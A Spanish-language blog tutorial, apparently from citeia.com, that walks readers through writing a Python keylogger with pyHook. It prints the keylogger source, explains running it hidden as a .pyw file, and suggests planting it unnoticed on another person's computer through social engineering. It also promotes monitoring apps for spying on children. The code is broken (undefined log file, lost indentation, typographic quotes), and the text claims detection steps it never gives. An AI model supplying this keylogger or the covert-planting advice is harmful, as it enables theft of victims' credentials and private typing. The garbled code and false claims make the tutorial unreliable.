Cómo crear un Keylogger

Antes de comenzar, he de aclarar que un KEYLOGGER es ilegal si su uso se emplea en delitos, por ejemplo, conseguir los datos y credenciales de alguna persona. Este artículo está realizado únicamente como formativo y de uso Académico y para que entiendas su funcionamiento.

Uso legal del keylogger

Si estás buscando emplear un keylogger de control parental para controlar legalmente la navegación de tus hijos te recomendamos el siguiente. En ese caso deberás asegurarte de tener el consentimiento de tus hijos y que estos sean conscientes de que estás utilizando un software de monitorización. Revisa la legislación al respecto de tu país.

Recomendado para hacer control parental legalmente:

  1. uMobixPuedes ver nuestra reseña aquí
  2. mSpy Puedes ver nuestra reseña aquí
  3. EyezyPuedes ver nuestra reseña aquí

¿Que es un Keylogger?

El Keylogger es un software de malware muy utilizado en el mundo del hack. Este malware nos permite registrar todo el contenido introducido en el teclado de la persona que utilice el dispositivo.

Es muy peligroso ya que puede registrar todo tipo de credenciales incluidas credenciales bancarias o de otras aplicaciones que se utilicen mientras el software está activo.

Este software de malware es bastante complejo de utilizar de manera remota, es necesario tener bastante conocimiento al respecto. Pero vamos a enseñarte a crear un Keylogger que puedas utilizar en tu ordenador local para que puedas ver su funcionamiento de primera mano.

¡CUIDADO! Si no es tu ordenador personal, acabarás registrando credenciales de tu pareja, familiares u otras personas si lo haces en el tuyo o si tienen acceso a tu ordenador. Esto es ilegal si no tienes consentimiento explícito y deberán estar notificados de que estás registrando sus datos.

El construir nuestro propio Keylogger nos va a permitir utilizarlo en nuestro ordenador para guardar todos los registros de teclado realizados. También poder asegurarnos de que ninguna persona llega a utilizar nuestro equipo sin previo permiso.

De todos modos, te dejaremos un post más explicativo de lo que es un Keylogger y su uso:

Cómo crear un Keylogger

Para poder proceder necesitaremos del uso de Python 2.7, Pyhook o Pywin32 o no podremos hacer que funcione el Script que vamos a crear.

Para descargar Python puedes hacerlo desde este enlace, solo te llevará unos minutos.

Lo primero que tendremos que hacer para comenzar a crear un Keywlogger es abrir el editor de Python.

Dentro de nuestro documento en blanco vamos a introducir el siguiente código:

Código keylogger gratis

</pre>
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location

def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format=’%(message)s’)
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
<pre>

Una vez copiado y pegado lo que vamos a hacer es darle a guardar. Es importante que lo guardemos con la extensión .pyw. Quedándote el archivo de esta manera “keylogger.pyw”.

Bien. Tenemos el Keylogger listo para registrar los movimientos del teclado y empezar a espiar el uso de nuestro ordenador. Con este código las pulsaciones se guardarán en un fichero independiente.

Bueno, vamos a arrancar nuestro nuevo Script. Bastará con hacer doble clic encima del archivo y automáticamente comenzaremos a registrar toda la actividad.

Cuando queramos apagar el Keylogger, solo tendremos que abrir el administrador de tareas (Control+Alt+Supr) y finalizar el proceso de Python. Así lo apagaremos de manera forzada.

citeia.com

Ahora viene la parte divertida, una vez finalizado el proceso nos dirigiremos a buscar el fichero “keyloggeroutput.txt”. Lo encontraremos en el mismo directorio donde guardamos el Keylogger. Haremos doble clic en este y….

¡Tachán!

Tenemos el registro de todo el uso del teclado registrado con nuestro ordenador desde que ha estado el Keylogger activo. Ya has aprendido cómo crear un Keylogger en tu PC y hacer ciertas pruebas.

Vamos ahora a hablarte sobre el caso de que tu PC sea infectado con un virus de este tipo por cualquier vía. De hecho, más abajo te dejaremos una de las formas en que se puede implantar un Keylogger en elordenador de una persona, te recomendamos leerlo.

Ahora, supongamos que sospechas que tienes un Keylogger instalado en tu computadora y ves ciertas actividades raras, pues no te preocupes. Ya te mostramos cómo detectar y eliminar este de forma manual. Sin embargo, existen varios programas y aplicaciones para detectar y eliminar automáticamente un Keylogger de tu PC, conócelas en este post que te dejamos acá:

Si estás interesado en este tipo de herramientas deja un comentario para decidir cuál sea la siguiente.

En el caso de que se quisiera plantar el Keylogger de una manera desapercibida en el ordenador de alguien, se podría hacer fácilmente mediante Ingeniería Social.

La Ingeniería Social permite adentrarte en la forma de pensar de alguien utilizando una recopilación de información acerca de la víctima para así planificar y lanzar un ataque efectivo contra el usuario.

Es uno de los métodos con los que se puede complementar cualquier estrategia de hacking (Aunque no sólo se utiliza en el Hacking)

Si quieres informarte acerca de como aplicar Ingeniería Social en el hacking te recomiendo revisar el siguiente Artículo.

¿Es posible hackear humanos? La Ingeniería social

citeia.com

También puedes descargar la versión en PDF de manera gratuita. (14 Páginas de uso académico)

También Puedes descargar el PDF de manera gratuita en Formato revista para leerlo más tarde.

PDF DESCARGABLE: #1 Ingeniería Social para Hacking

Esperamos que te haya sido útil.

Puede Interesarte: ¿Cómo saber si me han hackeado el mail?

Salir de la versión móvil